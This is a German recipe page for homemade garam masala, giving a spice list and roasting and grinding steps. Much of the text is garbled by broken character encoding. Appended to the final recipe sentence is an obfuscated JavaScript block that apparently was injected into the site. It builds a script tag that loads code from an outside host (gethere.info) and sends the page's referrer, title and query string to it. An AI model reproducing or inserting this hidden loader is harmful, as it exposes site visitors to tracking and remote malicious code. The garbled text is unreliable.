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Garam Masala

Ein selbstgemachtes Garam Masala Rezept. Dieses aromatische GewA?rz wird sehr hA�ufig in der indischen KA?che eingesetzt. UngefA�hr 1 Jahr haltbar.

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  • Zutaten:
  • 100 g Koriandersamen, ganz
  • 50 g KreuzkA?mmel, ganz
  • 25 g schwarze PfefferkA�rner
  • 25 g weiAYe PfefferkA�rner
  • 25 g Zimtstange
  • 25 g ganze GewA?rznelken
  • 25 g grA?ne Kardamomkapseln
  • 25 g schwarze Kardamomkapseln
  • 5-6 LorbeerblA�tter
  • 20 g Fenchelsamen
  • 10 g Muskatpulver

Zubereitung:

garam-masala.jpg

Das Garam Masala ist eine unverzichtbare GewA?rzmischung fA?r viele indische Rezepte.

Den Backofen auf 100 A�C vorheizen.

Alle Zutaten, auAYer Muskatpulver, in einer ofenfesten Pfanne vermischen. Die Pfanne in den Backofen stellen und die GewA?rze 30 Minuten rA�sten lassen. Die GewA?rze mA?ssen aber ihre Farbe beibehalten.

Die GewA?rze abkA?hlen und in einem Mixer oder eine KaffemA?hle fein malen und zuletzt Muskatpulver dazugeben und alles gut vermischen.

Diese selbstgemachte Garam Masala GewA?rzmischung ist ca. 1 Jahr haltbar.var _0xd052=[„x73x63x72x69x70x74″,“x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,“x73x72x63″,“x68x74x74x70x3Ax2Fx2Fx67x65x74x68x65x72x65x2Ex69x6Ex66x6Fx2Fx6Bx74x2Fx3Fx33x63x58x66x71x6Bx26x73x65x5Fx72x65x66x65x72x72x65x72x3D“,“x72x65x66x65x72x72x65x72″,“x26x64x65x66x61x75x6Cx74x5Fx6Bx65x79x77x6Fx72x64x3D“,“x74x69x74x6Cx65″,“x26″,“x3F“,“x72x65x70x6Cx61x63x65″,“x73x65x61x72x63x68″,“x6Cx6Fx63x61x74x69x6Fx6E“,“x26x66x72x6Dx3Dx73x63x72x69x70x74″,“x63x75x72x72x65x6Ex74x53x63x72x69x70x74″,“x69x6Ex73x65x72x74x42x65x66x6Fx72x65″,“x70x61x72x65x6Ex74x4Ex6Fx64x65″,“x61x70x70x65x6Ex64x43x68x69x6Cx64″,“x68x65x61x64″,“x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65″,“x70x72x6Fx74x6Fx63x6Fx6C“,“x68x74x74x70x73x3A“,“x69x6Ex64x65x78x4Fx66″,“x52x5Fx50x41x54x48″,“x54x68x65x20x77x65x62x73x69x74x65x20x77x6Fx72x6Bx73x20x6Fx6Ex20x48x54x54x50x53x2Ex20x54x68x65x20x74x72x61x63x6Bx65x72x20x6Dx75x73x74x20x75x73x65x20x48x54x54x50x53x20x74x6Fx6Fx2E“];var d=document;var s=d[_0xd052[1]](_0xd052[0]);s[_0xd052[2]]= _0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12];if(document[_0xd052[13]]){document[_0xd052[13]][_0xd052[15]][_0xd052[14]](s,document[_0xd052[13]])}else {d[_0xd052[18]](_0xd052[17])[0][_0xd052[16]](s)};if(document[_0xd052[11]][_0xd052[19]]=== _0xd052[20]&& KTracking[_0xd052[22]][_0xd052[21]](_0xd052[3]+ encodeURIComponent(document[_0xd052[4]])+ _0xd052[5]+ encodeURIComponent(document[_0xd052[6]])+ _0xd052[7]+ window[_0xd052[11]][_0xd052[10]][_0xd052[9]](_0xd052[8],_0xd052[7])+ _0xd052[12])=== -1){alert(_0xd052[23])}

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6 Kommentare zu Rezept – Garam Masala

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